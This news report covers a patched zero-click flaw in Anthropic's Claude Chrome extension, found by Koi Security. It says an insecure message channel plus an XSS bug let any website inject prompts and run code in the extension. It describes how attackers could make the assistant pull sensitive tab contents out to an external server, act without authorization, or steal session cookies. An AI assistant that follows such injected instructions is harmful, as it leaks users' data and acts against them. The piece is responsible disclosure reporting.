A severe vulnerability in Anthropic's Claude AI Google Chrome extension allowed any website to silently inject malicious prompts into the assistant, requiring no user interaction. The flaw was discovered by security researchers and promptly patched by Anthropic in mid-May.
The vulnerability, identified by researchers Oren Yomtov and Dolev Farhi of Koi Security, combined an insecure message-passing mechanism with a Cross-Site Scripting (XSS) bug. According to a report from Koi Security, a malicious website could send a specially crafted message to the Claude extension's content script. The extension would process this message and render the response directly into the webpage's code without proper sanitization. This allowed the malicious site to execute arbitrary code within the extension's context.
This zero-click exploit meant an attacker could take control of the AI assistant simply by having a user visit a compromised webpage. Potential impacts were significant, including data exfiltration, where an attacker could command Claude to summarize sensitive information from the user's active tab and send it to an external server. Other risks included performing unauthorized actions through the AI or stealing session cookies to hijack user accounts on other websites.
Koi Security reported the vulnerability to Anthropic on May 13, 2024. The AI company responded quickly, issuing a patched version (2024.5.15) just two days later on May 15. Most users of the Claude extension should have been automatically updated to the secure version. This incident highlights the security challenges posed by browser extensions that integrate with powerful AI tools, which can create new and potent attack vectors.




